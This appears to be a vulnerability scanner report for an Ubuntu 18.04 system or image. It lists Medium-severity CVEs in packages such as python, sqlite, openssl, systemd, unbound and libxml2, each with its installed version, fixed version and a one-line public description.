Medium CVE-2020-29361 libp11-kit-dev 0.23.9-20.23.9-2ubuntu0.1p11-kit: integer overflow when allocating memory for arrays or attributes and object identifiers libp11-kit-dev:0.23.9-2
Medium CVE-2020-29362 libp11-kit-dev 0.23.9-20.23.9-2ubuntu0.1p11-kit: out-of-bounds read in p11_rpc_buffer_get_byte_array function in rpc-message.c libp11-kit-dev:0.23.9-2
Medium CVE-2020-29363 libp11-kit-dev 0.23.9-20.23.9-2ubuntu0.1p11-kit: out-of-bounds write in p11_rpc_buffer_get_byte_array_value function in rpc-message.c libp11-kit-dev:0.23.9-2
Medium CVE-2020-29361 libp11-kit0 0.23.9-20.23.9-2ubuntu0.1p11-kit: integer overflow when allocating memory for arrays or attributes and object identifiers libp11-kit0:0.23.9-2
Medium CVE-2020-29362 libp11-kit0 0.23.9-20.23.9-2ubuntu0.1p11-kit: out-of-bounds read in p11_rpc_buffer_get_byte_array function in rpc-message.c libp11-kit0:0.23.9-2
Medium CVE-2020-29363 libp11-kit0 0.23.9-20.23.9-2ubuntu0.1p11-kit: out-of-bounds write in p11_rpc_buffer_get_byte_array_value function in rpc-message.c libp11-kit0:0.23.9-2
Medium CVE-2018-18311 libperl5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Integer overflow leading to buffer overflow in Perl_my_setenv() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 libperl5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_handle_regex_sets() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 libperl5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer read overflow in S_grok_bslash_N() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 libperl5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_regatom() libperl5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-1000802 libpython2.7-minimal 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Command injection in the shutil module libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 libpython2.7-minimal 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Missing salt initialization in _elementtree.c module libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-20852 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Cookie domain check returns incorrect results libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-10160 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-16056 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.2python: email.utils.parseaddr wrongly parses email addresses libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-18348 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-20907 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9636 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Information Disclosure due to urlsplit improper NFKC normalization libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9740 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the query part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9947 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the path part of the url passed to urlopen() libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9948 libpython2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2020-26116 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.2python: CRLF injection via HTTP request method in httplib/http.client libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-3177 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.6python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-4189 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2022-0391 libpython2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-1000802 libpython2.7-stdlib 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Command injection in the shutil module libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-14647 libpython2.7-stdlib 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Missing salt initialization in _elementtree.c module libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-20852 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Cookie domain check returns incorrect results libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-10160 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-16056 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.2python: email.utils.parseaddr wrongly parses email addresses libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-18348 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-20907 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9636 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Information Disclosure due to urlsplit improper NFKC normalization libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9740 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the query part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9947 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the path part of the url passed to urlopen() libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2019-9948 libpython2.7-stdlib 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2020-26116 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1.2python: CRLF injection via HTTP request method in httplib/http.client libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2021-3177 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1.6python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2021-4189 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2022-0391 libpython2.7-stdlib 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython2.7-stdlib:2.7.15~rc1-1
Medium CVE-2018-14647 libpython3.6-minimal 3.6.5-33.6.7-1~18.04python: Missing salt initialization in _elementtree.c module libpython3.6-minimal:3.6.5-3
Medium CVE-2018-20852 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Cookie domain check returns incorrect results libpython3.6-minimal:3.6.5-3
Medium CVE-2019-10160 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython3.6-minimal:3.6.5-3
Medium CVE-2019-16056 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.3python: email.utils.parseaddr wrongly parses email addresses libpython3.6-minimal:3.6.5-3
Medium CVE-2019-18348 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-20907 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9636 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Information Disclosure due to urlsplit improper NFKC normalization libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9740 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the query part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9947 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the path part of the url passed to urlopen() libpython3.6-minimal:3.6.5-3
Medium CVE-2019-9948 libpython3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython3.6-minimal:3.6.5-3
Medium CVE-2020-26116 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.3python: CRLF injection via HTTP request method in httplib/http.client libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3177 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.4python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3733 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: Regular expression DoS in AbstractBasicAuthHandler libpython3.6-minimal:3.6.5-3
Medium CVE-2021-3737 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: HTTP client possible infinite loop on a 100 Continue response libpython3.6-minimal:3.6.5-3
Medium CVE-2021-4189 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response libpython3.6-minimal:3.6.5-3
Medium CVE-2022-0391 libpython3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython3.6-minimal:3.6.5-3
Medium CVE-2018-14647 libpython3.6-stdlib 3.6.5-33.6.7-1~18.04python: Missing salt initialization in _elementtree.c module libpython3.6-stdlib:3.6.5-3
Medium CVE-2018-20852 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: Cookie domain check returns incorrect results libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-10160 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-16056 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.3python: email.utils.parseaddr wrongly parses email addresses libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-18348 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-20907 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9636 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: Information Disclosure due to urlsplit improper NFKC normalization libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9740 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the query part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9947 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the path part of the url passed to urlopen() libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-9948 libpython3.6-stdlib 3.6.5-33.6.8-1~18.04.2python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms libpython3.6-stdlib:3.6.5-3
Medium CVE-2020-26116 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.3python: CRLF injection via HTTP request method in httplib/http.client libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3177 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.4python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3733 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: Regular expression DoS in AbstractBasicAuthHandler libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-3737 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: HTTP client possible infinite loop on a 100 Continue response libpython3.6-stdlib:3.6.5-3
Medium CVE-2021-4189 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response libpython3.6-stdlib:3.6.5-3
Medium CVE-2022-0391 libpython3.6-stdlib 3.6.5-33.6.9-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs libpython3.6-stdlib:3.6.5-3
Medium CVE-2019-19906 libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.1cyrus-sasl: denial of service in _sasl_add_string function libsasl2-2:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-19906 libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.1cyrus-sasl: denial of service in _sasl_add_string function libsasl2-modules:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-19906 libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu22.1.27~101-g0780600+dfsg-3ubuntu2.1cyrus-sasl: denial of service in _sasl_add_string function libsasl2-modules-db:2.1.27~101-g0780600+dfsg-3ubuntu2
Medium CVE-2019-9893 libseccomp2 2.3.1-2.1ubuntu42.4.1-0ubuntu0.18.04.2libseccomp: incorrect generation of syscall filters in libseccomp libseccomp2:2.3.1-2.1ubuntu4
Medium CVE-2018-20346 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.1CVE-2018-20505 CVE-2018-20506 sqlite: Multiple flaws in sqlite which can be triggered via corrupted internal databases (Magellan) libsqlite3-0:3.22.0-1
Medium CVE-2018-20506 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.1CVE-2018-20346 CVE-2018-20505 CVE-2018-20506 sqlite: Multiple flaws in sqlite which can be triggered via corrupted internal databases (Magellan) libsqlite3-0:3.22.0-1
Medium CVE-2019-13734 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: fts3: improve shadow table corruption detection libsqlite3-0:3.22.0-1
Medium CVE-2019-13750 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: dropping of shadow tables not restricted in defensive mode libsqlite3-0:3.22.0-1
Medium CVE-2019-13751 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: fts3: improve detection of corrupted records libsqlite3-0:3.22.0-1
Medium CVE-2019-13752 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: fts3: improve shadow table corruption detection libsqlite3-0:3.22.0-1
Medium CVE-2019-13753 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: fts3: incorrectly removed corruption check libsqlite3-0:3.22.0-1
Medium CVE-2019-19923 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: mishandling of certain uses of SELECT DISTINCT involving a LEFT JOIN in flattenSubquery in select.c leads to a NULL pointer dereference libsqlite3-0:3.22.0-1
Medium CVE-2019-19925 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: zipfileUpdate in ext/misc/zipfile.c mishandles a NULL pathname during an update of a ZIP archive libsqlite3-0:3.22.0-1
Medium CVE-2019-19926 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: error mishandling because of incomplete fix of CVE-2019-19880 libsqlite3-0:3.22.0-1
Medium CVE-2019-19959 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: mishandles certain uses of INSERT INTO in situations involving embedded '\0' characters in filenames libsqlite3-0:3.22.0-1
Medium CVE-2019-8457 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.1sqlite: heap out-of-bound read in function rtreenode() libsqlite3-0:3.22.0-1
Medium CVE-2019-9936 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.1sqlite: heap-based buffer over-read in function fts5HashEntrySort in sqlite3.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13434 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.4sqlite: integer overflow in sqlite3_str_vappendf function in printf.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13630 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.4sqlite: Use-after-free in fts3EvalNextRow in ext/fts3/fts3.c libsqlite3-0:3.22.0-1
Medium CVE-2020-13632 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.4sqlite: NULL pointer dereference in ext/fts3/fts3_snippet.c via a crafted matchinfo() query libsqlite3-0:3.22.0-1
Medium CVE-2020-9327 libsqlite3-0 3.22.0-13.22.0-1ubuntu0.3sqlite: NULL pointer dereference and segmentation fault because of generated column optimizations libsqlite3-0:3.22.0-1
Medium CVE-2019-5094 libss2 1.44.1-11.44.1-1ubuntu1.2e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libss2:1.44.1-1
Medium CVE-2019-5188 libss2 1.44.1-11.44.1-1ubuntu1.3e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libss2:1.44.1-1
Medium CVE-2022-1304 libss2 1.44.1-11.44.1-1ubuntu1.4e2fsprogs: out-of-bounds read/write via crafted filesystem libss2:1.44.1-1
Medium CVE-2019-1559 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.3openssl: 0-byte record padding oracle libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-23841 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.6openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-3712 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.7openssl: Read buffer overruns processing ASN.1 strings libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2022-1292 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.9openssl: c_rehash script allows command injection libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2022-2068 libssl1.0.0 1.0.2n-1ubuntu5.11.0.2n-1ubuntu5.10openssl: the c_rehash script allows command injection libssl1.0.0:1.0.2n-1ubuntu5.1
Medium CVE-2021-23841 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.8openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2021-3712 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.13openssl: Read buffer overruns processing ASN.1 strings libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-1292 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.17openssl: c_rehash script allows command injection libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-2068 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.19openssl: the c_rehash script allows command injection libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2022-2097 libssl1.1 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.20openssl: AES OCB fails to encrypt some bytes libssl1.1:1.1.0g-2ubuntu4.1
Medium CVE-2018-15686 libsystemd0 237-3ubuntu10237-3ubuntu10.6systemd: line splitting via fgets() allows for state injection during daemon-reexec libsystemd0:237-3ubuntu10
Medium CVE-2018-15687 libsystemd0 237-3ubuntu10237-3ubuntu10.6systemd: Dereference of symlinks in chown_recursive.c:chown_one() allows for modification of file privileges libsystemd0:237-3ubuntu10
Medium CVE-2018-15688 libsystemd0 237-3ubuntu10237-3ubuntu10.4systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling libsystemd0:237-3ubuntu10
Medium CVE-2018-16866 libsystemd0 237-3ubuntu10237-3ubuntu10.11systemd: out-of-bounds read when parsing a crafted syslog message libsystemd0:237-3ubuntu10
Medium CVE-2018-6954 libsystemd0 237-3ubuntu10237-3ubuntu10.9systemd: Mishandled symlinks in systemd-tmpfiles allows local users to obtain ownership of arbitrary files libsystemd0:237-3ubuntu10
Medium CVE-2019-15718 libsystemd0 237-3ubuntu10237-3ubuntu10.28systemd: systemd-resolved allows unprivileged users to configure DNS libsystemd0:237-3ubuntu10
Medium CVE-2019-3842 libsystemd0 237-3ubuntu10237-3ubuntu10.19systemd: Spoofing of XDG_SEAT allows for actions to be checked against "allow_active" instead of "allow_any" libsystemd0:237-3ubuntu10
Medium CVE-2019-6454 libsystemd0 237-3ubuntu10237-3ubuntu10.13systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash libsystemd0:237-3ubuntu10
Medium CVE-2020-1712 libsystemd0 237-3ubuntu10237-3ubuntu10.38systemd: use-after-free when asynchronous polkit queries are performed libsystemd0:237-3ubuntu10
Medium CVE-2018-15686 libudev1 237-3ubuntu10237-3ubuntu10.6systemd: line splitting via fgets() allows for state injection during daemon-reexec libudev1:237-3ubuntu10
Medium CVE-2018-15687 libudev1 237-3ubuntu10237-3ubuntu10.6systemd: Dereference of symlinks in chown_recursive.c:chown_one() allows for modification of file privileges libudev1:237-3ubuntu10
Medium CVE-2018-15688 libudev1 237-3ubuntu10237-3ubuntu10.4systemd: Out-of-bounds heap write in systemd-networkd dhcpv6 option handling libudev1:237-3ubuntu10
Medium CVE-2018-16866 libudev1 237-3ubuntu10237-3ubuntu10.11systemd: out-of-bounds read when parsing a crafted syslog message libudev1:237-3ubuntu10
Medium CVE-2018-6954 libudev1 237-3ubuntu10237-3ubuntu10.9systemd: Mishandled symlinks in systemd-tmpfiles allows local users to obtain ownership of arbitrary files libudev1:237-3ubuntu10
Medium CVE-2019-15718 libudev1 237-3ubuntu10237-3ubuntu10.28systemd: systemd-resolved allows unprivileged users to configure DNS libudev1:237-3ubuntu10
Medium CVE-2019-3842 libudev1 237-3ubuntu10237-3ubuntu10.19systemd: Spoofing of XDG_SEAT allows for actions to be checked against "allow_active" instead of "allow_any" libudev1:237-3ubuntu10
Medium CVE-2019-6454 libudev1 237-3ubuntu10237-3ubuntu10.13systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash libudev1:237-3ubuntu10
Medium CVE-2020-1712 libudev1 237-3ubuntu10237-3ubuntu10.38systemd: use-after-free when asynchronous polkit queries are performed libudev1:237-3ubuntu10
Medium CVE-2019-25031 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: configuration injection in create_unbound_ad_servers.sh upon a successful man-in-the-middle attack against a cleartext HTTP session libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25032 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: integer overflow in the regional allocator via regional_alloc libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25033 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: integer overflow in the regional allocator via the ALIGN_UP macro libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25034 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: integer overflow in sldns_str2wire_dname_buf_origin can lead to an out-of-bounds write libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25035 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: out-of-bounds write in sldns_bget_token_par libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25036 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: assertion failure and denial of service in synth_cname libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25037 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: assertion failure and denial of service in dname_pkt_copy via an invalid packet libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25038 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: integer overflow in a size calculation in dnscrypt/dnscrypt.c libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25039 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: integer overflow in a size calculation in respip/respip.c libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25040 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: infinite loop via a compressed name in dname_pkt_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25041 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: assertion failure via a compressed name in dname_pkt_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2019-25042 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.4unbound: out-of-bounds write via a compressed name in rdata_copy libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2020-12662 libunbound2 1.6.7-1ubuntu2.11.6.7-1ubuntu2.3unbound: amplification of an incoming query into a large number of queries directed to a target libunbound2:1.6.7-1ubuntu2.1
Medium CVE-2018-14598 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Crash on invalid reply in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2018-14599 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Off-by-one error in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2018-14600 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Out of Bounds write in XListExtensions in ListExt.c libx11-6:2:1.6.4-3
Medium CVE-2020-14344 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.3libX11: Heap overflow in the X input method client libx11-6:2:1.6.4-3
Medium CVE-2020-14363 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.3libX11: integer overflow leads to double free in locale handling libx11-6:2:1.6.4-3
Medium CVE-2021-31535 libx11-6 2:1.6.4-32:1.6.4-3ubuntu0.4libX11: missing request length checks libx11-6:2:1.6.4-3
Medium CVE-2018-14598 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Crash on invalid reply in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2018-14599 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Off-by-one error in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2018-14600 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.1libX11: Out of Bounds write in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2020-14344 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.3libX11: Heap overflow in the X input method client libx11-data:2:1.6.4-3
Medium CVE-2020-14363 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.3libX11: integer overflow leads to double free in locale handling libx11-data:2:1.6.4-3
Medium CVE-2021-31535 libx11-data 2:1.6.4-32:1.6.4-3ubuntu0.4libX11: missing request length checks libx11-data:2:1.6.4-3
Medium CVE-2018-14404 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.2libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2018-14567 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.2libxml2: Infinite loop caused by incorrect error detection during LZMA decompression libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3516 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.4libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3517 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.4libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3518 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.4libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3537 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.4libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2022-23308 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.5libxml2: Use-after-free of ID and IDREF attributes libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2022-29824 libxml2 2.9.4+dfsg1-6.1ubuntu12.9.4+dfsg1-6.1ubuntu1.6libxml2: integer overflows in xmlBuf and xmlBuffer lead to out-of-bounds write libxml2:2.9.4+dfsg1-6.1ubuntu1
